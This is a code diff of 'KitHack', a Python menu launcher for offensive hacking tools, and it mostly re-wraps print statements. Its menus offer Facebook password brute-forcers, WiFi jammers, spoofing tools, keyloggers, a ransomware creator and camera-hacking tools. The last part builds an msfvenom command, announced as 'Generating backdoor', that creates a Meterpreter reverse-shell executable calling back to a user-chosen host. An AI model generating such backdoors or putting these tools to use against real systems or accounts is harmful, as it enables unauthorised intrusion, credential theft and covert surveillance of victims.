Phishing Tool.".format( + WHITE, YELLOW, DEFAULT)) print( - "{0}09){1} Evil Limiter {2}Device bandwidth limiting tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}07){1} WiFi-Pumpkin {2}AP framework to easily create fake networks." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}10){1} Netool-toolkit {2}MitM pentesting open source toolkit.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}08){1} Wifresti {2}Find your wireless network password on Windows, Linux and Mac OS." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}09){1} Evil Limiter {2}Device bandwidth limiting tool.". + format(WHITE, YELLOW, DEFAULT)) print( - "{0}11){1} Dracnmap {2}Tool used to exploit networks and collect data with NMAP.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}10){1} Netool-toolkit {2}MitM pentesting open source toolkit.". + format(WHITE, YELLOW, DEFAULT)) print( - "{0}12){1} Airgeddon {2}Bash script to audit wireless networks.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}11){1} Dracnmap {2}Tool used to exploit networks and collect data with NMAP." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}13){1} Routersploit {2}Router Penetration Testing Modules.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}12){1} Airgeddon {2}Bash script to audit wireless networks." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}14){1} Eaphammer {2}Kit to perform targeted attacks against WPA2-Enterprise networks.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}13){1} Routersploit {2}Router Penetration Testing Modules.". + format(WHITE, YELLOW, DEFAULT)) print( - "{0}15){1} VMR-MDK {2}Script to decrypt WPS wireless networks.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}14){1} Eaphammer {2}Kit to perform targeted attacks against WPA2-Enterprise networks." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}16){1} Wirespy {2}Allows you to configure fast honeypots to carry out MITM.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}15){1} VMR-MDK {2}Script to decrypt WPS wireless networks." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}17){1} Wireshark {2}Network Capture/Analyzing Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}18){1} SniffAir {2}Wireless Pentesting Framework.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}19){1} WifiJammer {2}WiFi Client/Router Jammer.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}20){1} KawaiiDeauther {2}WiFi DeAuth Attack Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}16){1} Wirespy {2}Allows you to configure fast honeypots to carry out MITM." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}17){1} Wireshark {2}Network Capture/Analyzing Tool.". + format(WHITE, YELLOW, DEFAULT)) + print("{0}18){1} SniffAir {2}Wireless Pentesting Framework.". + format(WHITE, YELLOW, DEFAULT)) + print("{0}19){1} WifiJammer {2}WiFi Client/Router Jammer.".format( + WHITE, YELLOW, DEFAULT)) + print("{0}20){1} KawaiiDeauther {2}WiFi DeAuth Attack Tool.".format( + WHITE, YELLOW, DEFAULT)) print("{0} 0){1} Back".format(WHITE, YELLOW)) tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) @@ -596,75 +468,42 @@ def main(): elif option == "05": os.system("clear") print( - "======={0}Tool{1}====================================={0}Information{1}================================".format( - GREEN, DEFAULT - ) - ) - print( - "{0}01){1} Cupp {2}Allows you to create dictionaries specifically for a person.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "======={0}Tool{1}====================================={0}Information{1}================================" + .format(GREEN, DEFAULT)) print( - "{0}02){1} Facebooker {2}Facebook Password Bruteforcer Made in Perl.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}01){1} Cupp {2}Allows you to create dictionaries specifically for a person." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}03){1} BluForce-FB {2}Facebook Password Bruteforcer.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}04){1} Brut3k1t {2}Bruteforce Attack Kit.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}05){1} SocialBox {2}Bruteforce Framework.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}02){1} Facebooker {2}Facebook Password Bruteforcer Made in Perl." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}03){1} BluForce-FB {2}Facebook Password Bruteforcer.". + format(WHITE, YELLOW, DEFAULT)) + print("{0}04){1} Brut3k1t {2}Bruteforce Attack Kit.".format( + WHITE, YELLOW, DEFAULT)) + print("{0}05){1} SocialBox {2}Bruteforce Framework.".format( + WHITE, YELLOW, DEFAULT)) print( "{0}06){1} John The Ripper {2}Password Bruteforcing Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}07){1} Hashcat {2}Hash Cracking Toolkit.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}08){1} Brutedum {2}SSH/FTP/Telnet/PostgreSQL/RDP/VNC/Medusa Bruteforcer.".format( - WHITE, YELLOW, DEFAULT - ) - ) + WHITE, YELLOW, DEFAULT)) + print("{0}07){1} Hashcat {2}Hash Cracking Toolkit.".format( + WHITE, YELLOW, DEFAULT)) print( - "{0}09){1} Facebash {2}Facebook Bruteforcer Made in Shellscript Using TOR.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}08){1} Brutedum {2}SSH/FTP/Telnet/PostgreSQL/RDP/VNC/Medusa Bruteforcer." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}10){1} Brutespray {2}Port Scanner/Bruteforcer.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}09){1} Facebash {2}Facebook Bruteforcer Made in Shellscript Using TOR." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}10){1} Brutespray {2}Port Scanner/Bruteforcer.".format( + WHITE, YELLOW, DEFAULT)) print( - "{0}11){1} Pupi {2}Password Generator Using Personal Information.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}11){1} Pupi {2}Password Generator Using Personal Information." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}12){1} B4r-brute {2}Facebook Account Cracker Using User ID.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}12){1} B4r-brute {2}Facebook Account Cracker Using User ID." + .format(WHITE, YELLOW, DEFAULT)) print( - '{0}13){1} Fb-Hack {2}Facebook Password "Hack"/Recovery Script.'.format( - WHITE, YELLOW, DEFAULT - ) - ) + '{0}13){1} Fb-Hack {2}Facebook Password "Hack"/Recovery Script.' + .format(WHITE, YELLOW, DEFAULT)) print("{0} 0){1} Back".format(WHITE, YELLOW)) tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) @@ -722,90 +561,48 @@ def main(): elif option == "06": os.system("clear") print( - "======={0}Tool{1}========================================={0}Information{1}========================================".format( - GREEN, DEFAULT - ) - ) + "======={0}Tool{1}========================================={0}Information{1}========================================" + .format(GREEN, DEFAULT)) print( "{0}01){1} SQLmap {2}SQLi Penetration Testing Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) + WHITE, YELLOW, DEFAULT)) print( "{0}02){1} XAttacker {2}Website Vulnerability Scanner.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}03){1} Fuxploider {2}Detect favorable techniques to load web shells or any malicious files.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}04){1} Wordpresscan {2}WordPress Vulnerability Scanner.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}05){1} SiteBroker {2}Information Collecting/Website Penetration Testing Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}06){1} NoSQLMap {2}NoSQL Default Configuration Weakness Exploitation Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}07){1} Sqli-scanner {2}SQL Injection Vulnerability Scanner.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}08){1} Joomscan {2}Website Misconfiguration Scanner.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}09){1} Metagoofil {2}Metadata Extraction Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}10){1} Sublist3r {2}Subdomain Enumeration Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}11){1} WAFNinja {2}Web Application Firewall Attacker.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}12){1} Dirsearch {2}Directory/File Path Bruteforcing Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}13){1} XSStrike {2}Advanced XSS Scanner.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}14){1} LinksF1nd3r {2}Web Component Extractor.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}15){1} D-TECT {2}Modern Website Penetration Testing Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}16){1} Phpsploit {2}Tool capable of maintaining access to a compromised web server.".format( - WHITE, YELLOW, DEFAULT - ) - ) + WHITE, YELLOW, DEFAULT)) + print( + "{0}03){1} Fuxploider {2}Detect favorable techniques to load web shells or any malicious files." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}04){1} Wordpresscan {2}WordPress Vulnerability Scanner.". + format(WHITE, YELLOW, DEFAULT)) + print( + "{0}05){1} SiteBroker {2}Information Collecting/Website Penetration Testing Tool." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}06){1} NoSQLMap {2}NoSQL Default Configuration Weakness Exploitation Tool." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}07){1} Sqli-scanner {2}SQL Injection Vulnerability Scanner.". + format(WHITE, YELLOW, DEFAULT)) + print("{0}08){1} Joomscan {2}Website Misconfiguration Scanner.". + format(WHITE, YELLOW, DEFAULT)) + print("{0}09){1} Metagoofil {2}Metadata Extraction Tool.".format( + WHITE, YELLOW, DEFAULT)) + print("{0}10){1} Sublist3r {2}Subdomain Enumeration Tool.".format( + WHITE, YELLOW, DEFAULT)) + print("{0}11){1} WAFNinja {2}Web Application Firewall Attacker.". + format(WHITE, YELLOW, DEFAULT)) + print( + "{0}12){1} Dirsearch {2}Directory/File Path Bruteforcing Tool.". + format(WHITE, YELLOW, DEFAULT)) + print("{0}13){1} XSStrike {2}Advanced XSS Scanner.".format( + WHITE, YELLOW, DEFAULT)) + print("{0}14){1} LinksF1nd3r {2}Web Component Extractor.".format( + WHITE, YELLOW, DEFAULT)) + print( + "{0}15){1} D-TECT {2}Modern Website Penetration Testing Tool." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}16){1} Phpsploit {2}Tool capable of maintaining access to a compromised web server." + .format(WHITE, YELLOW, DEFAULT)) print("{0} 0){1} Back".format(WHITE, YELLOW)) tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) @@ -872,40 +669,22 @@ def main(): elif option == "07": os.system("clear") print( - "======={0}Tool{1}====================================={0}Information{1}==================================".format( - GREEN, DEFAULT - ) - ) - print( - "{0}01){1} SpoofMAC {2}MAC Address Spoofing Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}02){1} Ip_spoofing {2}ARP/HTTP Spoofing Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}03){1} Arpspoof {2}ARP Spoofing Attacl Tool Using Linux Kernel Sockets.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}04){1} DerpNSpoof {2}Simple DNS Spoofing Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}05){1} DrSpoof {2}ARP Spoofing Detection Tool For Local Networks.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}06){1} GODKILLER {2}SMS Bomber/Sender.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "======={0}Tool{1}====================================={0}Information{1}==================================" + .format(GREEN, DEFAULT)) + print("{0}01){1} SpoofMAC {2}MAC Address Spoofing Tool.".format( + WHITE, YELLOW, DEFAULT)) + print("{0}02){1} Ip_spoofing {2}ARP/HTTP Spoofing Tool.".format( + WHITE, YELLOW, DEFAULT)) + print( + "{0}03){1} Arpspoof {2}ARP Spoofing Attacl Tool Using Linux Kernel Sockets." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}04){1} DerpNSpoof {2}Simple DNS Spoofing Tool.".format( + WHITE, YELLOW, DEFAULT)) + print( + "{0}05){1} DrSpoof {2}ARP Spoofing Detection Tool For Local Networks." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}06){1} GODKILLER {2}SMS Bomber/Sender.".format( + WHITE, YELLOW, DEFAULT)) print("{0} 0){1} Back".format(WHITE, YELLOW)) tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) @@ -942,110 +721,59 @@ def main(): elif option == "08": os.system("clear") print( - "========={0}Tool{1}========================================{0}Information{1}========================================".format( - GREEN, DEFAULT - ) - ) - print( - "{0}01){1} NMAP {2}Network Scanning Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}02){1} Th3inspector {2}AIO Information Gathering Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}03){1} FBI {2}Collection of sensitive information on Facebook accounts.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}04){1} Infoga {2}Email Information Extraction Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}05){1} Crips {2}IP Address/Website/DNS Record Lookup Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}06){1} BillCipher {2}Website/IP Address Information Lookup Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}07){1} RED_HAWK {2}Tool to collect information, scan vulnerabilities and trace.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}08){1} Recon-ng {2}Information Gathering Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}09){1} theHarvester {2}Collection of emails, names, subdomains, IP addresses and URLs.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}10){1} PhoneInfoga {2}Phone Number Information Lookup Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}11){1} Gasmask {2}AIO Information Gathering Tool #2.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}12){1} URLextractor {2}Website Information Gathering/Reconnaissance Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}13){1} Devploit {2}Website DNS/WhoIS/IP/GeoIP/Subnet/Port/Host Lookup Tool".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}14){1} ReconDog {2}AIO Basic Information Gathering Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}15){1} Webkiller {2}Information Collection Kit.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}16){1} Quasar {2}Information Collection Framework.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}17){1} Info-instagram {2}Instagram Information Extraction Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}18){1} UserScan {2}Username Lookup/Identity Scanner Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}19){1} XCTR-Hacking {2}AIO Information Gathering Tool #3.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}20){1} DeadTrap {2}Phone Number OSINT Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "========={0}Tool{1}========================================{0}Information{1}========================================" + .format(GREEN, DEFAULT)) + print("{0}01){1} NMAP {2}Network Scanning Tool.".format( + WHITE, YELLOW, DEFAULT)) + print("{0}02){1} Th3inspector {2}AIO Information Gathering Tool.". + format(WHITE, YELLOW, DEFAULT)) + print( + "{0}03){1} FBI {2}Collection of sensitive information on Facebook accounts." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}04){1} Infoga {2}Email Information Extraction Tool.". + format(WHITE, YELLOW, DEFAULT)) + print( + "{0}05){1} Crips {2}IP Address/Website/DNS Record Lookup Tool." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}06){1} BillCipher {2}Website/IP Address Information Lookup Tool." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}07){1} RED_HAWK {2}Tool to collect information, scan vulnerabilities and trace." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}08){1} Recon-ng {2}Information Gathering Tool.".format( + WHITE, YELLOW, DEFAULT)) + print( + "{0}09){1} theHarvester {2}Collection of emails, names, subdomains, IP addresses and URLs." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}10){1} PhoneInfoga {2}Phone Number Information Lookup Tool." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}11){1} Gasmask {2}AIO Information Gathering Tool #2.". + format(WHITE, YELLOW, DEFAULT)) + print( + "{0}12){1} URLextractor {2}Website Information Gathering/Reconnaissance Tool." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}13){1} Devploit {2}Website DNS/WhoIS/IP/GeoIP/Subnet/Port/Host Lookup Tool" + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}14){1} ReconDog {2}AIO Basic Information Gathering Tool." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}15){1} Webkiller {2}Information Collection Kit.".format( + WHITE, YELLOW, DEFAULT)) + print("{0}16){1} Quasar {2}Information Collection Framework.". + format(WHITE, YELLOW, DEFAULT)) + print( + "{0}17){1} Info-instagram {2}Instagram Information Extraction Tool." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}18){1} UserScan {2}Username Lookup/Identity Scanner Tool." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}19){1} XCTR-Hacking {2}AIO Information Gathering Tool #3.". + format(WHITE, YELLOW, DEFAULT)) + print("{0}20){1} DeadTrap {2}Phone Number OSINT Tool.".format( + WHITE, YELLOW, DEFAULT)) print("{0} 0){1} Back".format(WHITE, YELLOW)) tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) @@ -1124,145 +852,81 @@ def main(): elif option == "09": os.system("clear") print( - "======{0}Tool{1}===================================================={0}Information{1}=======================================".format( - GREEN, DEFAULT - ) - ) + "======{0}Tool{1}===================================================={0}Information{1}=======================================" + .format(GREEN, DEFAULT)) print( - "{0}01){1} TheFatRat {2}Malware Compiling Tool For Linux/Windows/MacOS & Android.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}01){1} TheFatRat {2}Malware Compiling Tool For Linux/Windows/MacOS & Android." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}02){1} Msfpc {2}Payload Generation Tool.". + format(WHITE, YELLOW, DEFAULT)) print( - "{0}02){1} Msfpc {2}Payload Generation Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}03){1} Fcrackzip {2}Archive Password Cracking Tool." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}03){1} Fcrackzip {2}Archive Password Cracking Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}04){1} QRLjacker {2}QR Code Session Hijacking Tool." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}04){1} QRLjacker {2}QR Code Session Hijacking Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}05){1} Lazy {2}Script that automates many penetration processes.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}06){1} HTBINVITE {2}HTB Invite Generator.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}05){1} Lazy {2}Script that automates many penetration processes." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}06){1} HTBINVITE {2}HTB Invite Generator.". + format(WHITE, YELLOW, DEFAULT)) print( "{0}07){1} Ngrok {2}Local Reverse Proxy.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}08){1} Bluepot {2}Bluetooth Honeypot Written in Java.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}09){1} Setoolkit {2}Open Source Social Engineering Toolkit.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}10){1} A2sv {2}SSL Vulnerability Scanner.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}11){1} 4nonimizer {2}IP Anonymizer Using VPN Services.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}12){1} Easysploit {2}Metasploit Automation Toolkit.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}13){1} NXcrypt {2}Malware Injection Toolkit For Python Files.".format( - WHITE, YELLOW, DEFAULT - ) - ) + WHITE, YELLOW, DEFAULT)) print( - "{0}14){1} KnockMail {2}Email Validity Checker".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}08){1} Bluepot {2}Bluetooth Honeypot Written in Java." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}15){1} RkHunter {2}UNIX Rootkit/Backdoor/Local Exploit Detection Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}09){1} Setoolkit {2}Open Source Social Engineering Toolkit." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}16){1} HeraKeylogger {2}Chrome Keylogger Extension.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}10){1} A2sv {2}SSL Vulnerability Scanner.". + format(WHITE, YELLOW, DEFAULT)) print( - "{0}17){1} ZLogger {2}Persistent Remote Keylogger for Windows and Linux.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}11){1} 4nonimizer {2}IP Anonymizer Using VPN Services." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}18){1} Xerosploit {2}Penetration Testing Toolkit.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}12){1} Easysploit {2}Metasploit Automation Toolkit." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}19){1} Slacksec {2}Basic Hacking Toolkit.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}13){1} NXcrypt {2}Malware Injection Toolkit For Python Files." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}14){1} KnockMail {2}Email Validity Checker". + format(WHITE, YELLOW, DEFAULT)) print( - "{0}20){1} Katana-Framework {2}Penetration Testing Framework.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}15){1} RkHunter {2}UNIX Rootkit/Backdoor/Local Exploit Detection Tool." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}21){1} Z0172CK-Tools {2}Z0172CK Hacking Toolkit.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}16){1} HeraKeylogger {2}Chrome Keylogger Extension.". + format(WHITE, YELLOW, DEFAULT)) print( - "{0}22){1} Cam-Hack {2}Advanced Mobile/PC Camera Hacking Tool Using a Link.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}17){1} ZLogger {2}Persistent Remote Keylogger for Windows and Linux." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}23){1} Onex {2}Hacking Tool Library.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}18){1} Xerosploit {2}Penetration Testing Toolkit." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}19){1} Slacksec {2}Basic Hacking Toolkit.". + format(WHITE, YELLOW, DEFAULT)) print( - "{0}24){1} Ransom0 {2}Ransomware Creation Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}20){1} Katana-Framework {2}Penetration Testing Framework." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}21){1} Z0172CK-Tools {2}Z0172CK Hacking Toolkit.". + format(WHITE, YELLOW, DEFAULT)) print( - "{0}25){1} Morpheus {2}TCP/UDP Man-in-the-Middle Attack Suite.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}22){1} Cam-Hack {2}Advanced Mobile/PC Camera Hacking Tool Using a Link." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}23){1} Onex {2}Hacking Tool Library.". + format(WHITE, YELLOW, DEFAULT)) + print("{0}24){1} Ransom0 {2}Ransomware Creation Tool.". + format(WHITE, YELLOW, DEFAULT)) print( - "{0}26){1} FBTOOL {2}Facebook Hacking Toolkit".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}25){1} Morpheus {2}TCP/UDP Man-in-the-Middle Attack Suite." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}26){1} FBTOOL {2}Facebook Hacking Toolkit". + format(WHITE, YELLOW, DEFAULT)) print( - "{0}27){1} Venom {2}Metasploit Shellcode Generator/Compiler/Driver.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}27){1} Venom {2}Metasploit Shellcode Generator/Compiler/Driver." + .format(WHITE, YELLOW, DEFAULT)) print("{0} 0){1} Back".format(WHITE, YELLOW)) tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) @@ -1364,14 +1028,22 @@ def main(): os.system("clear") print(msf_banner) print("\n{0} [*] {1}Sys Payloads:\n".format(DEFAULT, GREEN)) - print("{0}[01] {1}LINUX {0}--> {2}Kithack.elf".format(WHITE, YELLOW, RED)) - print("{0}[02] {1}WINDOWS {0}--> {2}Kithack.exe".format(WHITE, YELLOW, RED)) - print("{0}[03] {1}ANDROID {0}--> {2}Kithack.apk".format(WHITE, YELLOW, RED)) - print("{0}[04] {1}MAC OS {0}--> {2}Kithack.macho".format(WHITE, YELLOW, RED)) - print("{0}[05] {1}PHP {0}--> {2}Kithack.php".format(WHITE, YELLOW, RED)) - print("{0}[06] {1}PYTHON {0}--> {2}Kithack.py".format(WHITE, YELLOW, RED)) - print("{0}[07] {1}BASH {0}--> {2}Kithack.sh".format(WHITE, YELLOW, RED)) - print("{0}[08] {1}PERL {0}--> {2}Kithack.pl".format(WHITE, YELLOW, RED)) + print("{0}[01] {1}LINUX {0}--> {2}Kithack.elf".format( + WHITE, YELLOW, RED)) + print("{0}[02] {1}WINDOWS {0}--> {2}Kithack.exe".format( + WHITE, YELLOW, RED)) + print("{0}[03] {1}ANDROID {0}--> {2}Kithack.apk".format( + WHITE, YELLOW, RED)) + print("{0}[04] {1}MAC OS {0}--> {2}Kithack.macho".format( + WHITE, YELLOW, RED)) + print("{0}[05] {1}PHP {0}--> {2}Kithack.php".format( + WHITE, YELLOW, RED)) + print("{0}[06] {1}PYTHON {0}--> {2}Kithack.py".format( + WHITE, YELLOW, RED)) + print("{0}[07] {1}BASH {0}--> {2}Kithack.sh".format( + WHITE, YELLOW, RED)) + print("{0}[08] {1}PERL {0}--> {2}Kithack.pl".format( + WHITE, YELLOW, RED)) print("{0}[09] {1}RUN MSFCONSOLE {0}".format(WHITE, YELLOW)) print("{0} [0] {1}Back".format(WHITE, YELLOW)) @@ -1384,22 +1056,28 @@ def main(): elif sys == "01": print("{0}\n[*] {1}Select Payload:\n".format(DEFAULT, GREEN)) - print("{0}[01]{1} linux/x64/meterpreter_reverse_http".format(WHITE, YELLOW)) - print( - "{0}[02]{1} linux/x64/meterpreter_reverse_https".format(WHITE, YELLOW) - ) - print("{0}[03]{1} linux/x64/meterpreter_reverse_tcp".format(WHITE, YELLOW)) - print("{0}[04]{1} linux/x64/meterpreter/reverse_tcp".format(WHITE, YELLOW)) + print("{0}[01]{1} linux/x64/meterpreter_reverse_http".format( + WHITE, YELLOW)) + print("{0}[02]{1} linux/x64/meterpreter_reverse_https".format( + WHITE, YELLOW)) + print("{0}[03]{1} linux/x64/meterpreter_reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[04]{1} linux/x64/meterpreter/reverse_tcp".format( + WHITE, YELLOW)) print("{0}[05]{1} linux/x64/shell_bind_tcp".format(WHITE, YELLOW)) - print("{0}[06]{1} linux/x64/shell_reverse_tcp".format(WHITE, YELLOW)) - print("{0}[07]{1} linux/x86/meterpreter_reverse_http".format(WHITE, YELLOW)) - print( - "{0}[08]{1} linux/x86/meterpreter_reverse_https".format(WHITE, YELLOW) - ) - print("{0}[09]{1} linux/x86/meterpreter_reverse_tcp".format(WHITE, YELLOW)) - print("{0}[10]{1} linux/x86/meterpreter/reverse_tcp".format(WHITE, YELLOW)) + print("{0}[06]{1} linux/x64/shell_reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[07]{1} linux/x86/meterpreter_reverse_http".format( + WHITE, YELLOW)) + print("{0}[08]{1} linux/x86/meterpreter_reverse_https".format( + WHITE, YELLOW)) + print("{0}[09]{1} linux/x86/meterpreter_reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[10]{1} linux/x86/meterpreter/reverse_tcp".format( + WHITE, YELLOW)) print("{0}[11]{1} linux/x86/shell_bind_tcp".format(WHITE, YELLOW)) - print("{0}[12]{1} linux/x86/shell_reverse_tcp".format(WHITE, YELLOW)) + print("{0}[12]{1} linux/x86/shell_reverse_tcp".format( + WHITE, YELLOW)) pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) pay = pay.zfill(2) @@ -1408,55 +1086,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p linux/x64/meterpreter_reverse_http LHOST={0} LPORT={1} -f elf > output/{2}.elf".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p linux/x64/meterpreter_reverse_http LHOST={0} LPORT={1} -f elf > output/{2}.elf" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.elf".format(mainout)).st_size != 0: - print( - 